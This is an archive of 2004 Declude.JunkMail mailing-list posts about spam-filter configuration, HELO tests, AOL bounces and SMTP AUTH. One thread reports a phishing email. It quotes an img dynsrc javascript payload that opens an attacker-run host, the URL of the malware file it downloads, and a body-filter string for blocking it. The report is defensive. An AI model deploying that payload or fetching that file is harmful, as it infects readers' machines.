RE: [Declude.JunkMail] Weight and Action Question
Yep, a configuration of WEIGHT10 DELETE and a WEIGHT20 HOLD would indeed delete a message with a weight of 21. Something you mentioned earlier prompts me to point out another thing; the veterans in the list generally regard HOLD messages not as something they have to check out several times a day to manually sort, but rather as a convenient way to not bug the intended recipient while we are still able to retrieve and deliver the mail for that recipient in case of a false positive. The net result is that we're more likely to err by holding a message than to err by deleting it! For reviewing messages, SpamReview is very popular; I stopped using it a long time ago, though, due to the high volume I get (I delete very little). Also, the \imail\spool\spam folder will of course grow in time, so you'll want a handy utility that you can schedule to delete messages there that are older than whatever time you choose. See the Declude website, Tools page for links to these and other tools. Andrew 8) -Original Message- From: Goran Jovanovic [mailto:[EMAIL PROTECTED] Sent: Tuesday, April 20, 2004 8:28 PM To: [EMAIL PROTECTED] Subject: RE: [Declude.JunkMail] Weight and Action Question Think of it this way -- if you used the HOLD action for E-mail with a weight of 5 or higher, and the DELETE action for E-mail with a weight of 10 or higher, which action would you want taken on an E-mail with a weight of 25? In your description I would want the DELETE taken. I was thinking of the whole thing is a different light. Specific test gets action taken first then aggregate tests like WEIGHT20 get taken in highest to lowest weight order. Then other things... To paraphrase you JunkMail looks through all the actions of all the tests that have been tripped starting with the most severe (strict) DELETE and working down the list. So if you did it wrong and setup WEIGHT10 DELETE and WEIGHT20 HOLD then all e-mail with a weight of 10 or higher would be deleted and none would be held. Right? OK you would have to be mostly asleep to set it up this way... Goran --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] OT: ASCII code
Yep, also 0x20, also #20 Andrew 8) -Original Message- From: John Tolmachoff (Lists) [mailto:[EMAIL PROTECTED] Sent: Tuesday, April 20, 2004 10:47 PM To: [EMAIL PROTECTED] Subject: [Declude.JunkMail] OT: ASCII code A space is %20, correct? John Tolmachoff Engineer/Consultant/Owner eServices For You --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] Dangerous img dynsrc tag in body
Good tip!
This is what the web page is using:
http://netsecurity.about.com/cs/generalsecurity/a/aa021504.htm
to download a file it creates called C:\Program Files\Internet
Explorer\Iesearch.exe
by downloading and rename the file http://68.192.132.122:8067/mstasks.dat
which my latest Trend Micro OfficeScan has never seen before.
Here's a copy of the original 'sploit:
http://www.securityfocus.com/archive/1/358913
and yes, there is a patch. It is:
http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx
which was part of the April Critical Patch update.
Oh, and the website is hosted at:
ool-44c0847a.dyn.optonline.net
so this is a zombie running a webserver on somebody's home machine.
Andrew 8)
-Original Message-
From: Adrian Hauri [mailto:[EMAIL PROTECTED]
Sent: Tuesday, April 20, 2004 9:34 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Declude.JunkMail] Dangerous img dynsrc tag in body
Just for your information:
We received a couple of Spam emails (fake ebay notifications) with the
following dangerous tag in the body:
img dynsrc=javascript:window.open('http://68.192.132.122_:8067/')
(I added the _ at the end so it doesn't harm anyone)
As soon as you open the email, the window will open the url.
The website hosts a dangerous ActiveX script that gets executed as soon as
you open the website.
The Antivirus(F-prot, AVG, McAfee) did not find a virus in the email and let
it through because it's just a html tag.
I added a body filter that searches for img
dynsrc=javascript:window.open( and trash all emails based on that.
Adrian
---
[This E-mail was scanned for viruses by Declude Virus
(http://www.declude.com)]
---
This E-mail came from the Declude.JunkMail mailing list. To
unsubscribe, just send an E-mail to [EMAIL PROTECTED], and
type unsubscribe Declude.JunkMail. The archives can be found
at http://www.mail-archive.com.
---
[This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)]
---
This E-mail came from the Declude.JunkMail mailing list. To
unsubscribe, just send an E-mail to [EMAIL PROTECTED], and
type unsubscribe Declude.JunkMail. The archives can be found
at http://www.mail-archive.com.
Re: [Declude.JunkMail] US Treasury cannot do it right?
OK if I am right the US Treasury Department needs help! Very much so: They identified themselves as 10.0.7.238 instead of a host.domain !!?? This is very bad. There are actually 3 problems with this: [1] They did not identify themselves using a host name, which is the standard method. [2] They technically *did* identify themselves as a host name (10.0.7.238 in that context is a host name, not an IP). The host name 10.0.7.238 doesn't exist. If you use an IP rather than a hostname, you need to have it in brackets. [3] The IP they tried but failed to identify themselves as is a private IP, and therefore would be invalid anyway. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] Weight and Action Question
To paraphrase you JunkMail looks through all the actions of all the tests that have been tripped starting with the most severe (strict) DELETE and working down the list. That's another way of looking at it. In this case, if there is a conflict with an action that has already been taken, the one that has already been taken will have priority. So if you did it wrong and setup WEIGHT10 DELETE and WEIGHT20 HOLD then all e-mail with a weight of 10 or higher would be deleted and none would be held. Right? OK you would have to be mostly asleep to set it up this way... Correct. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] Scott's tests
The header of my message to the list is showing X-Weight: -17 (FIVETENIGNORE, SPFPASS, CURRENT, HEUR3, SPAMCHK) X-Declude-Sender: [EMAIL PROTECTED] [208.154.200.6] Scott, would you please comment on the last 4 : SPFPASS, CURRENT, HEUR3, SPAMCHK I suppose that i am now passing SPF? but why did i fail last 3 ? You are correct about SPFPASS (it's a good thing). CURRENT and HEUR3 can be ignored (they are internal tests we use here). SPAMCHK can also be ignored (since we have it at the strictest settings). So the only one that might be worth concern is FIVETENIGNORE -- but we're also listed in one of the FIVETEN* tests, so it isn't something to be too concerned about (they list entire ISPs in FIVETENIGNORE). -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
[Declude.JunkMail] More AOL problems
Hi all any help appreciated Is this specific for this sender ? or a problem with my server/DNS configs ? I do not see AOL acknowledging my IP adress anywhere . TIA Here is my log 20040414 082409 127.0.0.1 SMTP (0884048F) processing F:\Imail\spool\Qf19c0a01026e5656.SMD 20040414 082411 127.0.0.1 SMTP (0884048F) Trying aol.com (0) 20040414 082411 127.0.0.1 SMTP (0884048F) Connect aol.com [64.12.138.57:25] (1) 20040414 082414 127.0.0.1 SMTP (0884048F) 220-rly-xk06.mx.aol.com ESMTP mail_relay_in-xk6.10; Wed, 14 Apr 2004 04:24:14 -0500 20040414 082414 127.0.0.1 SMTP (0884048F) 220-America Online (AOL) and its affiliated companies do not 20040414 082414 127.0.0.1 SMTP (0884048F) 220- authorize the use of its proprietary computers and computer 20040414 082414 127.0.0.1 SMTP (0884048F) 220- networks to accept, transmit, or distribute unsolicited bulk 20040414 082414 127.0.0.1 SMTP (0884048F) 220- e-mail sent from the internet. Effective immediately: AOL 20040414 082414 127.0.0.1 SMTP (0884048F) 220- may no longer accept connections from IP addresses which 20040414 082414 127.0.0.1 SMTP (0884048F) 220 have no reverse-DNS (PTR record) assigned. 20040414 082414 127.0.0.1 SMTP (0884048F) EHLO mail.cefib.com 20040414 082415 127.0.0.1 SMTP (0884048F) 250-rly-xk06.mx.aol.com mail.cefib.com 20040414 082415 127.0.0.1 SMTP (0884048F) 250 HELP 20040414 082415 127.0.0.1 SMTP (0884048F) MAIL FROM:[EMAIL PROTECTED] 20040414 082424 127.0.0.1 SMTP (0884048F) 250 OK 20040414 082424 127.0.0.1 SMTP (0884048F) rdeliver aol.com [EMAIL PROTECTED] (1) [EMAIL PROTECTED] 2610 20040414 082424 127.0.0.1 SMTP (0884048F) QUIT 20040414 082424 127.0.0.1 SMTP (0884048F) 221 SERVICE CLOSING CHANNEL 20040414 082424 127.0.0.1 SMTP (0884048F) finished F:\Imail\spool\Qf19c0a01026e5656.SMD status=1 And here is aol reply : Reporting-MTA: dns; rly-xk06.mx.aol.com Arrival-Date: Wed, 14 Apr 2004 04:24:24 -0400 (EDT) Final-Recipient: RFC822; [EMAIL PROTECTED] Action: failed Status: 5.1.1 Remote-MTA: DNS; air-xk01.mail.aol.com Diagnostic-Code: SMTP; 550 lamintd IS NOT ACCEPTING MAIL FROM THIS SENDER Last-Attempt-Date: Wed, 14 Apr 2004 04:24:39 -0400 (EDT) --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] Scott's tests
these would be scott's logs, since these test where done on his server - Original Message - From: Markus Gufler [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Wednesday, April 21, 2004 5:51 AM Subject: RE: [Declude.JunkMail] Scott's tests Scott, would you please comment on the last 4 : SPFPASS, CURRENT, HEUR3, SPAMCHK I suppose that i am now passing SPF? but why did i fail last 3 ? For SPAMCHK please provide the spamchk log's for this message. Markus --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] More AOL problems
any help appreciated Is this specific for this sender ? or a problem with my server/DNS configs ? I do not see AOL acknowledging my IP adress anywhere . This: 20040414 082414 127.0.0.1 SMTP (0884048F) 220-rly-xk06.mx.aol.com ESMTP mail_relay_in-xk6.10; Wed, 14 Apr 2004 04:24:14 -0500 20040414 082414 127.0.0.1 SMTP (0884048F) 220-America Online (AOL) and its affiliated companies do not 20040414 082414 127.0.0.1 SMTP (0884048F) 220- authorize the use of its proprietary computers and computer 20040414 082414 127.0.0.1 SMTP (0884048F) 220- networks to accept, transmit, or distribute unsolicited bulk 20040414 082414 127.0.0.1 SMTP (0884048F) 220- e-mail sent from the internet. Effective immediately: AOL 20040414 082414 127.0.0.1 SMTP (0884048F) 220- may no longer accept connections from IP addresses which 20040414 082414 127.0.0.1 SMTP (0884048F) 220 have no reverse-DNS (PTR record) assigned. Is the standard AOL boilerplate SMTP greeting that they send to everyone. 20040414 082415 127.0.0.1 SMTP (0884048F) MAIL FROM:[EMAIL PROTECTED] 20040414 082424 127.0.0.1 SMTP (0884048F) 250 OK 20040414 082424 127.0.0.1 SMTP (0884048F) rdeliver aol.com [EMAIL PROTECTED] (1) [EMAIL PROTECTED] 2610 I believe something is missing here (RCPT TO and DATA lines), but the rdeliver line indicates that the E-mail was successfully sent. And here is aol reply : Reporting-MTA: dns; rly-xk06.mx.aol.com Arrival-Date: Wed, 14 Apr 2004 04:24:24 -0400 (EDT) Final-Recipient: RFC822; [EMAIL PROTECTED] Action: failed Status: 5.1.1 Remote-MTA: DNS; air-xk01.mail.aol.com Diagnostic-Code: SMTP; 550 lamintd IS NOT ACCEPTING MAIL FROM THIS SENDER Last-Attempt-Date: Wed, 14 Apr 2004 04:24:39 -0400 (EDT) That means that after AOL received the E-mail, they bounced it. Presumably, the AOL user does not want mail from [EMAIL PROTECTED] (perhaps they reported it as spam). That may not be the case, however (bounce message reasons are often vague, confusing, or completely wrong). -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] New test
on 4/20/04 3:16 PM, Matt wrote: NOTCONTAINS would be incredibly helpful for lots of filters, though of course all forms of NOT filters would be good addition, but NOTCONTAINS is the most flexible and therefore capable, especially to defeat a counterbalancing filter so that it doesn't credit too much. I agree 100%! I'm sure you probably have a reason for this, but you might consider whitelisting your own address space and using Hijack for spam prevention. If you were on IMail 8, WHITELIST AUTH and PREWHITELIST ON wouldn't be bad ideas either if you required AUTH. We're an ISP and we believe we can't whitelist our addresses and we definitely can't require authentication. I believe that Entourage on a Mac will fail CMDSPACE, No, you misread one of of my original messages when CMDSPACE was released and have continued to state that Entourage on a Mac will fail CMDSPACE when that is not true. least sometimes fail this new HELOIP test, Yes, Microsoft's Entourage (Mac) and Apple's Mail both fail the new HELOISIP test. If I get some time I may install some other Mac OS X e-mail clients to see if they fail the same test. That might let me know if the problem is an e-mail client problem or a Unix (BSD under the Mac interface) problem. By the way, have you fixed the problem with your external size program? Later, Greg --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] US Treasury cannot do it right?
Yeah, I got sick of modifying my setups for others mistakes.. I've just ended up forwarding them the message with the internet headers telling them what the problem is, how to fix it, and that messages from them will be blocked/reviewed until the problems are fixed.. Haven't gotten any respsonses though.. Goes with the normal IT mentality.. It's not our problem, its yours.. Your setup is wrong.. Ours is perfect.. UGH! I hate hearing that.. Right there I know they don't even want to look at their logs, etc to try and resolve the problem.. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kevin Bilbee Sent: Tuesday, April 20, 2004 11:30 PM To: [EMAIL PROTECTED] Subject: RE: [Declude.JunkMail] US Treasury cannot do it right? My personal oppioion is that ISP's, government agencies, Technology companies should be held to a higher standard than the average business. If they are not following standards then they should be held for review. They can be comprimized by zombies just like everyone else. After reviwing the held messages then notify the admin of the problem. I think part of the problem with false positives are the people finding the misconfigurations are modifying their rule sets to accomidate the failure of other mail admins to configure their systems correctly. When they should be notifying them of their problems so they can fix them. Kevin Bilbee -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Goran Jovanovic Sent: Tuesday, April 20, 2004 8:11 PM To: [EMAIL PROTECTED] Subject: [Declude.JunkMail] US Treasury cannot do it right? OK if I am right the US Treasury Department needs help! They identified themselves as 10.0.7.238 instead of a host.domain !!?? This is very bad. There is a REVDNS for the sending IP 66.77.65.238 PTR record: lists.qai.irs.gov What am I asking here? Perhaps it is just amazement that the e-mail got out like this. I suppose there is nothing that we can do from this end except build enough room in our tests to prevent legit stuff from getting caught. The more I look into this SPAM stuff the scarier it gets. - Received: from 10.0.7.238 [66.77.65.238] by tlsonline.com (SMTPD32-8.10 ) id A63E11DB00DA; Tue, 20 Apr 2004 12:56:30 -0400 Date: Tue, 20 Apr 2004 12:55:42 -0400 (EDT) Message-Id: [EMAIL PROTECTED] ts.treas.g ov From: US Treasury Release: News [EMAIL PROTECTED] To: US Treasury Release: News [EMAIL PROTECTED] Subject: [US Treasury] Treasury and IRS Address Foreign Tax Credit, Partnership Transactions List-Unsubscribe: mailto:[EMAIL PROTECTED] List-Subscribe: mailto:[EMAIL PROTECTED] Reply-To: US Treasury Release: News [EMAIL PROTECTED] X-Message-Id: [EMAIL PROTECTED] Sender: [EMAIL PROTECTED] X-RBL-Warning: NOABUSE: Not supporting [EMAIL PROTECTED] X-RBL-Warning: HELOBOGUS: Domain 10.0.7.238 has no MX or A records [0301]. X-RBL-Warning: IPNOTINMX: X-RBL-Warning: NOLEGITCONTENT: No content unique to legitimate E-mail detected. X-Declude-Sender: [EMAIL PROTECTED] [66.77.65.238] X-Declude-Spoolname: D563e11db00dae005.SMD X-Note: This E-mail was sent from lists.qai.irs.gov ([66.77.65.238]). X-Spam-Tests-Failed: NOABUSE, HELOBOGUS, IPNOTINMX, NOLEGITCONTENT, HELOISIP, HELOISIPX [7] X-Note: This E-mail was scanned by Declude JunkMail (www.declude.com) for spam. X-Note: Total spam weight of this E-mail is 7. X-Country-Chain: Organization: The LAN Shoppe Goran Jovanovic The LAN Shoppe --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
[Declude.JunkMail] This got through.. -Question-
Just a question.. The message below (internet headers listed only) got through and only failed on the CMDSPACE test.. But one of the X-Notes states the there was a timeout looking up the IP address (it's 24-51-32-177.kntnny.adelphia.net).. Anyway, I was wondering if there was a test could be added that would add a low-weight (say 2 or 3) for timeouts during DNS lookups? Only bad thing, if your DNS server fails, so will a majority of your messages.. Any thoughts? __ Received: from emailaddresses.com [24.51.32.177] by mail.crescentdigital.com (SMTPD32-6.06) id ABBD117012A; Wed, 21 Apr 2004 01:50:53 -0400 Message-ID: [EMAIL PROTECTED] From: Cheapest Only Shop [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Your Doctor say no? We will say yes! 82928 Date: Wed, 21 Apr 2004 00:50:40 -0500 Mime-Version: 1.0 Content-Type: multipart/alternative; boundary==_NextPart_600_2990_759E2990.759E2990 X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-RBL-Warning: CMDSPACE: Space found in RCPT TO: command . X-Declude-Sender: [EMAIL PROTECTED] [24.51.32.177] X-Note: This E-mail was scanned by Declude JunkMail (www.declude.com) for spam. X-Spam-Tests-Failed: CMDSPACE [8] X-Note: This E-mail was sent from (timeout) ([24.51.32.177]). X-RCPT-TO: [EMAIL PROTECTED] X-UIDL: 382030971 Status: U --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] OT: ASCII code
Correct... Darrell John Tolmachoff (Lists) writes: A space is %20, correct? John Tolmachoff Engineer/Consultant/Owner eServices For You --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. Check Out DLAnalyzer a comprehensive reporting tool for Declude Junkmail Logs - http://www.invariantsystems.com --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] HELOBOGUS, HELOISIP and HELOISIPX questions
Goran Jovanovic wrote: This is parts of a header I received and I just want to check a few things So the spammer thought that he would use my IP address in the HELO line 205.150.108.8 to identify his domain, even though his real IP address is 220.185.227.109? Obviously an IP address is not a valid domain so it fails the HELOBOGUS test? It failed the HELOISIP test because the domain was an IP address? Yes. It would be more correct to say that HELOISIP failed because the domain _contained_ an IP address. 205.150.108.8.this.is.a.host.name would also have failed HELOISIP It failed the HELOISIPX test ... not sure why since there is no reverse DNS to parse? It failed HELOISIPX because the host name is a pure IP address. 205.150.108.8.this.is.a.host.name will *not* fail HELOISIPX. In the next release, both tests will not fail host names bracketed IP format [205.150.108.8] -- --- illigitimi non carborundum --- Bud Durland, CNE Mold-Rite Plastics Network Administrator http://www.mrpcap.com --- --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
[Declude.JunkMail] Where did the RHSBL list go?
Hello, All, Could someone tell me where I might find the list of RHSBL tests which used to be listed at the bottom of this page the old List of all Known DNS-Based Spam Databsaes? The new document is here, http://www.declude.com/Articles.asp?ID=97, but the RHSBL information seems to be have been removed. Thanks In Advance, Dan Geiser [EMAIL PROTECTED]
Re: [Declude.JunkMail] Where did the RHSBL list go?
Could someone tell me where I might find the list of RHSBL tests which used to be listed at the bottom of this page the old List of all Known DNS-Based Spam Databsaes? The new document is here, http://www.declude.com/Articles.asp?ID=97http://www.declude.com/Articles.asp?ID=97, but the RHSBL information seems to be have been removed. Thanks for pointing that out -- it looks like they were accidentally removed. I'll contact the person handling the new web site and let him know about this. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] US Treasury cannot do it right?
Well, I well mention his first name, blast shields up first. (He has a way of irritating people.) Len Conrad, most often seen on the Imail list. John Tolmachoff Engineer/Consultant/Owner eServices For You -Original Message- From: [EMAIL PROTECTED] [mailto:Declude.JunkMail- [EMAIL PROTECTED] On Behalf Of Goran Jovanovic Sent: Wednesday, April 21, 2004 6:01 AM To: [EMAIL PROTECTED] Subject: RE: [Declude.JunkMail] US Treasury cannot do it right? John, Took getting Len involved to set him straight. Who is Len? Goran Jovanovic --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] New test
Hello Sysadmin, it would be nice, if you could use a real name. We're an ISP and we believe we can't whitelist our addresses and we definitely can't require authentication. Why not? We do the same job, and I thought the same. But if all would think so, we will never get of the spammers. So (about 1,5 years ago) I decided to _require_ Auth, and we informed our customers about it. Some of them asked, most not. Tell them, they will get 10% less Spam, if you will require Auth, and they will love it :)) Alex --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] New test
We're an ISP and we believe we can't whitelist our addresses and we definitely can't require authentication. If you haven't your own network (ISP backbone) or users connecting from a defined range of IP's you SHOULD switch to SMTP-AUTH and you CAN prepare some usefull how-to pages, then inform your customers and give them some weeks to adapt the settings. With a little bit log-parsing you can also identify users that haven't enabled jet SMTP-AUTH and send them an additional alert. Markus --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] New test
on 4/21/04 11:17 AM, John Tolmachoff (Lists) wrote: Why are you so much different than other ISPs that you can not force authentication? Try to imagine having to contact thousands of subscribers and walk them through changing their settings. Even if we only took a minute to help each subscriber (and I can guarantee you a minute isn't even close to the time it would take to help our subscribers) were looking at 5+ 24 hour days doing nothing but that. If you really think about it, if you are not forcing authentication, you are ripe to allowing spamming and run-away viruses. Why? Could you please explain that logic to me as I don't understand it. We don't seem to be listed on any spam databases, see http://www.dnsstuff.com/tools/ip4r.ch?ip=12.4.184.4 . Later, Greg --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
[Declude.JunkMail] Processing load on machine
If the following is in the Global.cfg file, is it true that dnsbl.sorbs.net will be queried once and the result will be evaluated 8 times? SORBS-HTTP ip4rdnsbl.sorbs.net 127.0.0.2 5 0 SORBS-SOCKS ip4rdnsbl.sorbs.net 127.0.0.3 5 0 SORBS-MISC ip4rdnsbl.sorbs.net 127.0.0.4 5 0 SORBS-SMTP ip4rdnsbl.sorbs.net 127.0.0.5 5 0 SORBS-SPAM ip4rdnsbl.sorbs.net 127.0.0.6 7 0 SORBS-WEB ip4rdnsbl.sorbs.net 127.0.0.7 5 0 SORBS-BLOCK ip4rdnsbl.sorbs.net 127.0.0.8 5 0 SORBS-DUHL ip4rdnsbl.sorbs.net 127.0.0.10 6 0 [EMAIL PROTECTED] --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] New test
Why are you so much different than other ISPs that you can not force authentication? Try to imagine having to contact thousands of subscribers and walk them through changing their settings. Even if we only took a minute to help each subscriber (and I can guarantee you a minute isn't even close to the time it would take to help our subscribers) were looking at 5+ 24 hour days doing nothing but that. I, as well as every one else, understands that. What you need to do is formulate a plan to implement over say a month. Start with broadcast announcements and such. Then, start migrating your users in blocks. Yes, it would be a lot of work. But the results are worth it. If you really think about it, if you are not forcing authentication, you are ripe to allowing spamming and run-away viruses. Why? Could you please explain that logic to me as I don't understand it. I assume you are relaying for addresses in Imail SMTP. (If you are relaying for users or domains, you have no idea about relay settings.) That means that any one using one of those addresses can send out millions of spam e-mails through your server and there is nothing you can do about it. This includes users that may have viruses on their computers, and are now acting as robots. John Tolmachoff Engineer/Consultant/Owner eServices For You --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] New test
John, Dial-up ISP's, especially smaller ones, are very unlikely to be targeted by spammers due to the dynamic nature of the IP space. There one minute, gone the next...and the bandwidth sucks. Almost all viruses don't use mail servers to spread, so SMTP AUTH won't stop them either, but blocking port 25 would along with a host of other techniques which are less restrictive on legitimate use such as monitoring/automatic shuttoff of accounts. I looked up Greg's IP space in SenderBase and there are absolutely no signs of dial-up IP's leaking spam or viruses, and only his MX servers have any SpamCop hits, and these might be primarily related to his gateway accepting all locally addressed mail which then might get bounced by his primary IMail server for being unaddressable (I'm guessing here based on his lone abuse newsgroup listing). Even I have this problem currently due to software limitations, and it's going to cost me a good deal of money and time to create a work around so that I can do envelope rejection on the gateways. Overall I would say he's about as clean as they come and there's no cause for alarm. Matt John Tolmachoff (Lists) wrote: Why are you so much different than other ISPs that you can not force authentication? Try to imagine having to contact thousands of subscribers and walk them through changing their settings. Even if we only took a minute to help each subscriber (and I can guarantee you a minute isn't even close to the time it would take to help our subscribers) were looking at 5+ 24 hour days doing nothing but that. I, as well as every one else, understands that. What you need to do is formulate a plan to implement over say a month. Start with broadcast announcements and such. Then, start migrating your users in blocks. Yes, it would be a lot of work. But the results are worth it. If you really think about it, if you are not forcing authentication, you are ripe to allowing spamming and run-away viruses. Why? Could you please explain that logic to me as I don't understand it. I assume you are relaying for addresses in Imail SMTP. (If you are relaying for users or domains, you have no idea about relay 